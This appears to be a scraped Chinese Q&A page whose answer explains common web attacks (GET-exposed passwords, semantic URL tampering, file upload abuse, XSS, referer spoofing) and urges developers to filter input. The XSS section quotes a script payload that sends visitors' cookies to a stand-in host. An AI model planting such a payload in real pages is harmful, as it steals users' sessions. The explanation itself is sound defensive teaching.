问答文章1 问答文章501 问答文章1001 问答文章1501 问答文章2001 问答文章2501 问答文章3001 问答文章3501 问答文章4001 问答文章4501 问答文章5001 问答文章5501 问答文章6001 问答文章6501 问答文章7001 问答文章7501 问答文章8001 问答文章8501 问答文章9001 问答文章9501

什么是url攻击,浏览网页时杀软提示拦截url攻击,url攻击是什么样的,被

发布网友 发布时间:2022-04-01 04:02

我来回答

1个回答

热心网友 时间:2022-04-01 05:31

有时候程序员为了偷懒或者是在无意识的情况下缺少了对外部数据的过滤,Web安全习惯上将所有用户输入的数据假定为受污染的数据(即可能带有攻击性的数据),现在比较流行的XSS(跨站脚本攻击)就是利用对用户输入过滤不完全而进行的攻击,因为用户数据过滤不完全会导致很多很多问题,我这里只是简单的介绍几种比较常见的表单及URL攻击方式,希望读者能够最大限度的注意过滤用户输入。
1)表单数据泄漏攻击
这个一般刚入行的人可能会犯错,说得通俗一点,就是该用POST方式提交数据的时候,用了GET方式提交数据,比如,用户登录时候用了GET方法,导致用户名和密码都在URL上直接显示出来了,当然假如真的傻到这种程度,这种应用大多还是属于自己玩玩的东西,不是产品。还有一种是登录等操作,在提交数据的时候被窃听或者拦截了,这种没有很好的方式去解决,最多就是利用可以在浏览器上执行的脚本,比如JavaScript对密码和用户加密后提交到服务器,而且最好采用不可逆的公共算法,在浏览器端执行的脚本如果使用自己的算法,会增加被破解的几率,当然如果你的加密程度能超过或者接近现在流行的公共加密算法,那么也是可以的:)
2)语义URL攻击
这也是利用提交的形式及参数进行攻击的,假如使用GET方式找回密码,url为:http://example.org/private.php?user=abc&email=abc@11.org,那么产生的攻击也很简单,只要将user=abc改成任意其他的存在的用户密码就会发到后面的email中,轻松获取别人密码,POST方式大体也是通过窃听方式获得提交的数据
3)文件上传攻击
文件上传造成的危害在表单攻击中是最大的,假如成功入侵,最坏的情况甚至是可以干任何想干的事情,因此对此不可小觑。常见的有大文件攻击,假如你的服务端没有做*的话,那么你的硬盘很快就会被塞满,或者是你在客户端中只是简单的*了一下,那些对于心怀不轨者都是摆设,太容易绕开了。假如上传的是一个可执行的脚本,在某种情况下会激活这个脚本,那么后果就不堪设想,验证上传文件的后缀和*上传文件的种类是能避免大多数低级别的攻击者,但根本还是让存放用户上传的文件的目录没有执行权限,脚本不能执行,那么它也仅仅是一般文本而已。
4)跨站脚本攻击
跨站脚本攻击是众所周知的攻击方式之一。所有平台上的Web应用都深受其扰,PHP应用也不例外。
所有有输入的应用都面临着风险。Webmail,论坛,留言本,甚至是Blog。事实上,大多数Web应用提供输入是出于更吸引人气的目的,但同时这也会把自己置于危险之中。如果输入没有正确地进行过滤和转义,跨站脚本漏洞就产生了。
比如在一个博客平台提供商,一个心怀不轨的用户在写博客时故意在内容中插入<script> document.location = ’http://abc.example.org/steal.php?cookies=’ + document.cookie</script>,结果所有浏览这篇文章的读者的Cookie信息都在不知情的情况下发给了第三方。
5)HTTP请求欺骗攻击
所谓上有*下有对策,很多项目为了最大程度的得到高可信度的用户输入,甚至添加了判断referer的功能,可惜这个东西十分的不靠谱,随便一个CURL就可以欺骗过去。
毕竟所有的传输都只是个协议而已,而HTTP协议本身只是负责传输,并不负责诸如安全之类的其他问题,所以过程怎么伪造都是可以的,只要攻击者足够的熟悉HTTP协议,针对HTTP协议本身的攻击,似乎目前还没有看到,虽然欺骗、攻击随处可见,方式变化多样,只要做好了过滤,多想一点再多想一点,任何攻击得到的都是一个错误页面而已
声明声明:本网页内容为用户发布,旨在传播知识,不代表本网认同其观点,若有侵权等问题请及时与本网联系,我们将在第一时间删除处理。E-MAIL:11247931@qq.com
成年人上睑下垂的常见原因 警惕!总是睡眼惺忪,可能是上睑下垂惹的祸 为什么会上眼睑下垂?是什么引起了上眼睑下垂? 上眼睑下垂原因 excel里怎么在一行里换行 excel 自动换行怎么操作 表格中自动换行快捷键excel自动换行怎么操作 excel怎么换行 excel自动换行和手动换行方法介绍 ...考试可以不参加吗-高三一模不考对高考有影响吗 3的5倍是(),例式怎么写? 微信怎么复制所有的聊天截图 微信聊天记录怎么复制吖,整页的那种 web漏洞攻击有哪些? 喜欢你 - Beyond高品质音乐下载给我。谢谢。 求分享许志安-1992 喜欢你是你[香港K1首版]专辑无损音乐百度网盘下载 慢慢喜欢你莫文蔚mp3百度云 求 陈百强-偏偏喜欢你歌曲百度云网盘下载 灌篮高手主题曲中文好想大声说喜欢你 mp3下载 罗云熙喜欢你mp3下载 求莫文蔚慢慢喜欢你 mp3 百度云 求分享张震岳-就是喜欢你mp3音乐百度云网址 邓紫棋 喜欢你mp3 喜欢你 温岚 MP3 百度云下载音乐百度云? 求beyond的喜欢你mp3 喜欢你 百度云资源 求陈洁仪喜欢你MP3下载 哪位大神有《喜欢你》歌曲百度云网盘下载地址,求分享! 求徐佳莹的喜欢你 mp3 ! 谢谢! 喜欢你陈洁仪mp3百度云? 求希林娜依·高-喜欢你MP3百度云下载 炒面粉的做法 怎样做炒面粉 如何炒面粉窍门 好吃不贵的炒面粉怎么做好吃又简单,做法 炒面粉怎么炒 炒的面粉怎么做好吃法 如何炒面粉? 怎么用面粉炒炒面 炒面粉怎么制作的 炒熟的面粉怎么做才好吃? 求北方干炒面粉的做法 天猫精灵原来链接的设备删除了,怎么重新链? 天猫精灵方糖怎么样,有什么功能? 天猫精灵方糖不使用的时候为什么呼吸灯会亮呢 ARP欺骗攻击是什么意思? 孕期可以多吃苹果吗?对身体有什么好处? 孕妇可以吃苹果不? 孕妇期间多吃苹果,有哪些好处? 求各位,帮忙 微信朋友圈里别人给我的评论 怎么删除掉,,我不会删除啊 孕妇苹果能吃吗不能吃